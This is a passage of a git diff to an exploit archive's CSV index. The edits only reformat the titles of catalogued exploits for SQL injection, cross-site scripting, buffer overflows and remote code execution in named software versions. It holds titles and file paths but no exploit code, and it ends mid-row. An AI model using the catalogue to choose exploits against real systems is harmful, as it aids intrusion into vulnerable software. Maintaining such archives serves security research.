diff --git a/files.csv b/files.csv index eac264f8c..c648af376 100755 --- a/files.csv +++ b/files.csv @@ -379,7 +379,7 @@ id,file,description,date,author,platform,type,port 404,platforms/linux/remote/404.pl,"PlaySMS 0.7 - SQL Injection Exploit",2004-08-19,"Noam Rathaus",linux,remote,0 405,platforms/linux/remote/405.c,"XV 3.x BMP Parsing Local Buffer Overflow Exploit",2004-08-20,infamous41md,linux,remote,0 406,platforms/php/webapps/406.pl,"phpMyWebhosting SQL Injection Exploit",2004-08-20,"Noam Rathaus",php,webapps,0 -407,platforms/cgi/webapps/407.txt,"AWStats (5.0-6.3) Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 +407,platforms/cgi/webapps/407.txt,"AWStats 5.0-6.3 - Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 408,platforms/linux/remote/408.c,"Qt BMP Parsing Bug Heap Overflow Exploit",2004-08-21,infamous41md,linux,remote,0 409,platforms/bsd/remote/409.c,"BSD (telnetd) Remote Root Exploit",2001-06-09,Teso,bsd,remote,23 411,platforms/linux/local/411.c,"Sendmail 8.11.x - Exploit (i386-Linux)",2001-01-01,sd,linux,local,0 @@ -9364,7 +9364,7 @@ id,file,description,date,author,platform,type,port 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0 9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy ActiveX Control Remote code execution",2009-10-01,Trotzkista,windows,remote,0 -9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 +9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0 9996,platforms/php/webapps/9996.txt,"Article Directory Index.php Remote File Inclusion",2009-11-12,mozi,php,webapps,0 @@ -14274,7 +14274,7 @@ id,file,description,date,author,platform,type,port 16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,Metasploit,windows,remote,0 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,Metasploit,windows,remote,0 16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 -16474,platforms/windows/remote/16474.rb,"Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",2010-07-01,Metasploit,windows,remote,0 +16474,platforms/windows/remote/16474.rb,"Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow",2010-07-01,Metasploit,windows,remote,0 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) Login Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,Metasploit,windows,remote,0 @@ -15909,7 +15909,7 @@ id,file,description,date,author,platform,type,port 18351,platforms/netware/dos/18351.txt,"Novell Netware XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0 18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0 -18354,platforms/windows/remote/18354.py,"WorldMail imapd 3.0 SEH Overflow (egg hunter)",2012-01-12,TheXero,windows,remote,0 +18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter)",2012-01-12,TheXero,windows,remote,0 18355,platforms/php/webapps/18355.txt,"WordPress Count-per-day plugin - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload",2012-01-13,Dr.KroOoZ,php,webapps,0 @@ -25591,16 +25591,16 @@ id,file,description,date,author,platform,type,port 28542,platforms/multiple/dos/28542.pl,"Verso NetPerformer Frame Relay Access Device Telnet Buffer Overflow",2006-09-13,"Arif Jatmoko",multiple,dos,0 28543,platforms/php/webapps/28543.txt,"ForumJBC 4.0 Haut.php Cross-Site Scripting",2006-09-13,ThE__LeO,php,webapps,0 28544,platforms/php/webapps/28544.txt,"K2News Management 1.3 Ratings.php Cross-Site Scripting",2006-09-13,meto5757,php,webapps,0 -28545,platforms/php/webapps/28545.txt,"e107 website system 0.7.5 contact.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 -28546,platforms/php/webapps/28546.txt,"e107 website system 0.7.5 download.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 -28547,platforms/php/webapps/28547.txt,"e107 website system 0.7.5 admin.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 -28548,platforms/php/webapps/28548.txt,"e107 website system 0.7.5 fpw.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 -28549,platforms/php/webapps/28549.txt,"e107 website system 0.7.5 news.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 +28545,platforms/php/webapps/28545.txt,"e107 website system 0.7.5 - contact.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 +28546,platforms/php/webapps/28546.txt,"e107 website system 0.7.5 - download.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 +28547,platforms/php/webapps/28547.txt,"e107 website system 0.7.5 - admin.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 +28548,platforms/php/webapps/28548.txt,"e107 website system 0.7.5 - fpw.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 +28549,platforms/php/webapps/28549.txt,"e107 website system 0.7.5 - news.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28551,platforms/php/webapps/28551.txt,"e107 website system 0.7.5 - search.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 -28552,platforms/php/webapps/28552.txt,"e107 website system 0.7.5 signup.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 -28554,platforms/php/webapps/28554.txt,"e107 website system 0.7.5 submitnews.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 +28552,platforms/php/webapps/28552.txt,"e107 website system 0.7.5 - signup.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 +28554,platforms/php/webapps/28554.txt,"e107 website system 0.7.5 - submitnews.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28555,platforms/hardware/webapps/28555.txt,"Good for Enterprise 2.2.2.1611 - XSS",2013-09-25,Mario,hardware,webapps,0 -28556,platforms/php/webapps/28556.txt,"e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 +28556,platforms/php/webapps/28556.txt,"e107 website system 0.7.5 - user.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28557,platforms/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",php,webapps,80 28558,platforms/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure",2013-09-25,"Yann CAM",linux,webapps,0 28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b Index.php Remote File Inclusion",2006-09-23,Root3r_H3ll,php,webapps,0 @@ -26318,7 +26318,7 @@ id,file,description,date,author,platform,type,port 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 -29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0 +29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (1)",2013-10-31,noptrix,php,remote,0 29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 @@ -29276,7 +29276,7 @@ id,file,description,date,author,platform,type,port 32494,platforms/php/webapps/32494.txt,"FlashChat 'connection.php' Role Filter Security Bypass",2008-10-17,eLiSiA,php,webapps,0 32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 admin/cms/images.php orderby Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 admin/cms/nav.php nav_id Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 -32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module 'id' Parameter SQL Injection",2008-10-20,r45c4l,php,webapps,0 +32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module - 'id' Parameter SQL Injection",2008-10-20,r45c4l,php,webapps,0 32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 - 'index.php' SQL Injection",2008-10-21,KnocKout,php,webapps,0 32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 - 'aspkat.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 @@ -29314,7 +29314,7 @@ id,file,description,date,author,platform,type,port 32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 - 'moderation.php' Cross-Site Scripting",2008-10-27,Kellanved,php,webapps,0 32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'modules/banners/click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0 32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 -32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module 'tid' Parameter Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps,0 +32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Parameter Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps,0 32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6.0 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",php,webapps,0 32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 PHP Code Injection and Cookie Authentication Bypass Vulnerabilities",2008-10-28,StAkeR,php,webapps,0 32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,php,webapps,0 @@ -29363,7 +29363,7 @@ id,file,description,date,author,platform,type,port 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS - 'search_query' Parameter Cross-Site Scripting",2008-11-17,d3v1l,php,webapps,0 32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,Metasploit,php,remote,80 -32589,platforms/php/webapps/32589.html,"Kimson CMS 'id' Parameter Cross-Site Scripting",2008-11-18,md.r00t,php,webapps,0 +32589,platforms/php/webapps/32589.html,"Kimson CMS - 'id' Parameter Cross-Site Scripting",2008-11-18,md.r00t,php,webapps,0 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",windows,local,0 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0 32592,platforms/php/webapps/32592.txt,"Easyedit CMS subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 @@ -29375,8 +29375,8 @@ id,file,description,date,author,platform,type,port 32598,platforms/php/webapps/32598.txt,"COms 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,php,webapps,0 32599,platforms/hardware/remote/32599.txt,"Linksys WRT160N 'apply.cgi' Cross-Site Scripting",2008-11-27,"David Gil",hardware,remote,0 32600,platforms/php/webapps/32600.txt,"AssoCIateD 1.4.4 - 'menu' Parameter Cross-Site Scripting",2008-11-27,"CWH Underground",php,webapps,0 -32601,platforms/asp/webapps/32601.txt,"Ocean12 FAQ Manager Pro 'Keyword' Parameter Cross-Site Scripting",2008-11-29,"Charalambous Glafkos",asp,webapps,0 -32602,platforms/asp/webapps/32602.txt,"Multiple Ocean12 Products 'Admin_ID' Parameter SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps,0 +32601,platforms/asp/webapps/32601.txt,"Ocean12 FAQ Manager Pro - 'Keyword' Parameter Cross-Site Scripting",2008-11-29,"Charalambous Glafkos",asp,webapps,0 +32602,platforms/asp/webapps/32602.txt,"Multiple Ocean12 Products - 'Admin_ID' Parameter SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps,0 32603,platforms/asp/webapps/32603.txt,"Ocean12 Mailing LisManager Gold 2.04 - 'Email' Parameter SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps,0 32604,platforms/asp/webapps/32604.txt,"ParsBlogger 'blog.asp' Cross-Site Scripting",2008-11-29,Pouya_Server,asp,webapps,0 32605,platforms/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps,0 @@ -29497,7 +29497,7 @@ id,file,description,date,author,platform,type,port 32726,platforms/linux/dos/32726.txt,"Ganglia gmetad 3.0.6 - 'process_path()' Remote Stack Buffer Overflow",2009-01-15,"Spike Spiegel",linux,dos,0 32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter XSS",2009-01-15,waraxe,php,webapps,0 -32729,platforms/asp/webapps/32729.txt,"LinksPro 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 +32729,platforms/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32730,platforms/asp/webapps/32730.txt,"Active Bids search.asp search Parameter XSS",2009-01-15,Pouya_Server,asp,webapps,0 32731,platforms/asp/webapps/32731.txt,"Active Bids search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' Parameter SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 @@ -29513,7 +29513,7 @@ id,file,description,date,author,platform,type,port 32743,platforms/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Security Vulnerabilities",2014-04-08,"Juan Manuel Garcia",hardware,remote,0 32745,platforms/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443 32746,platforms/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps,0 -32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module 'url' Parameter SQL Injection",2009-01-23,"Sina Yazdanmehr",php,webapps,0 +32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module - 'url' Parameter SQL Injection",2009-01-23,"Sina Yazdanmehr",php,webapps,0 32748,platforms/asp/webapps/32748.txt,"BBSXP 5.13 - 'error.asp' Cross-Site Scripting",2009-01-23,arashps0,asp,webapps,0 32749,platforms/linux/dos/32749.txt,"Pidgin 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32750,platforms/asp/webapps/32750.txt,"OBLOG 'err.asp' Cross-Site Scripting",2009-01-23,arash.setayeshi,asp,webapps,0 @@ -29661,7 +29661,7 @@ id,file,description,date,author,platform,type,port 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0 32899,platforms/windows/dos/32899.py,"Jzip - SEH Unicode Buffer Overflow (Denial of Service)",2014-04-16,"motaz reda",windows,dos,0 -32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0 +32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service",2009-04-11,"Nam Nguyen",windows,dos,0 32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0 32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 @@ -29710,7 +29710,7 @@ id,file,description,date,author,platform,type,port 32950,platforms/php/webapps/32950.txt,"Flat Calendar 1.1 - 'add.php' HTML Injection",2009-04-22,ZoRLu,php,webapps,0 32951,platforms/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - (.sav) Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",novell,dos,0 32952,platforms/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Parameter Remote Command Execution",2009-04-23,SirGod,php,webapps,0 -32953,platforms/asp/webapps/32953.vbs,"PuterJam\'s Blog PJBlog3 3.0.6 \'action.asp\' SQL Injection",2009-04-24,anonymous,asp,webapps,0 +32953,platforms/asp/webapps/32953.vbs,"PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection",2009-04-24,anonymous,asp,webapps,0 32954,platforms/hardware/remote/32954.txt,"Linksys WVC54GCA 1.00R22/1.00R24 Wireless-G 'adm/file.cgi' Multiple Directory Traversal Vulnerabilities",2009-04-23,pagvac,hardware,remote,0 32955,platforms/hardware/remote/32955.js,"Linksys WVC54GCA 1.00R22/1.00R24 Wireless-G Multiple Cross-Site Scripting Vulnerabilities",2009-04-25,pagvac,hardware,remote,0 32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 File Handling Remote Denial of Service",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0 @@ -29778,7 +29778,7 @@ id,file,description,date,author,platform,type,port 33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0 33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",multiple,webapps,0 33020,platforms/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' NULL Pointer Dereference Denial Of Service",2009-06-02,"Anibal Sacco",linux,dos,0 -33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps,0 +33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module - 'query' Parameter Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps,0 33022,platforms/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 @@ -29835,10 +29835,10 @@ id,file,description,date,author,platform,type,port 33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33080,platforms/multiple/dos/33080.txt,"Oracle 11.1 Database Network Foundation Heap Memory Corruption",2009-06-14,"Dennis Yurichev",multiple,dos,0 33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",multiple,remote,0 -33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search 'search_p_groups' Parameter Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 +33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search - 'search_p_groups' Parameter Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33083,platforms/multiple/dos/33083.txt,"Oracle 9i/10g Database TNS Command Remote Denial of Service",2009-06-14,"Dennis Yurichev",multiple,dos,0 33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0 -33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader 'id' Parameter Cross-Site Scripting",2009-06-14,Moudi,php,webapps,0 +33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Parameter Cross-Site Scripting",2009-06-14,Moudi,php,webapps,0 33086,platforms/multiple/dos/33086.txt,"America's Army 3.0.4 Invalid Query Remote Denial of Service",2009-06-06,"Luigi Auriemma",multiple,dos,0 33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,php,webapps,0 33088,platforms/linux/dos/33088.txt,"Linux Kernel 2.6.30 - 'tun_chr_pool()' NULL Pointer Dereference",2009-06-17,"Christian Borntraeger",linux,dos,0 @@ -29890,7 +29890,7 @@ id,file,description,date,author,platform,type,port 40082,platforms/php/webapps/40082.txt,"WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent XSS",2016-07-11,"David Vaartjes",php,webapps,80 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0 -33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 +33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0 33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player 10.0.22 and AIR URI Parsing Heap Buffer Overflow",2009-07-30,iDefense,multiple,dos,0 33134,platforms/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",linux,dos,0 @@ -30015,8 +30015,8 @@ id,file,description,date,author,platform,type,port 33262,platforms/php/webapps/33262.txt,"Interspire Knowledge Manager 5 - 'p' Parameter Directory Traversal",2009-09-29,"Infected Web",php,webapps,0 33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0 33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 Email Arbitrary Script Injection",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 -33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder 'group_id' Parameter SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 -33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription 'email' Parameter Cross-Site Scripting",2009-10-06,"Paulo Santos",php,webapps,0 +33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder - 'group_id' Parameter SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 +33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription - 'email' Parameter Cross-Site Scripting",2009-10-06,"Paulo Santos",php,webapps,0 33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0 33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service",2009-10-15,"Doug Prostko",linux,dos,0 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution",2009-10-13,Skylined,windows,remote,0 @@ -30054,7 +30054,7 @@ id,file,description,date,author,platform,type,port 33304,platforms/php/webapps/33304.txt,"OpenDocMan 1.2.5 user.php XSS",2009-10-21,"Amol Naik",php,webapps,0 33305,platforms/php/webapps/33305.txt,"OpenDocMan 1.2.5 view_file.php XSS",2009-10-21,"Amol Naik",php,webapps,0 33306,platforms/linux/dos/33306.txt,"Snort 2.8.5 - Multiple Denial Of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos,0 -33307,platforms/php/webapps/33307.php,"RunCMS 'forum' Parameter SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 +33307,platforms/php/webapps/33307.php,"RunCMS - 'forum' Parameter SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Parameter Local File Disclosure",2009-10-27,"Greg Miernicki",php,webapps,0 33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting",2009-10-26,blake,php,webapps,0 33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0 @@ -30092,7 +30092,7 @@ id,file,description,date,author,platform,type,port 33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 atributo_list.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 caso_insert.php URL Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 33360,platforms/windows/local/33360.c,"Avast! Antivirus 4.8.1356 - 'aswRdr.sys' Driver Local Privilege Escalation",2009-11-16,Evilcry,windows,local,0 -33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products 'files/login.asp' Multiple SQL Injection",2009-11-17,blackenedsecurity,asp,webapps,0 +33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection",2009-11-17,blackenedsecurity,asp,webapps,0 33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'productId' Parameter SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 @@ -30113,7 +30113,7 @@ id,file,description,date,author,platform,type,port 33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x - Cross-Site Scripting",2008-02-16,MustLive,php,webapps,0 33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS - 'id' Parameter SQL 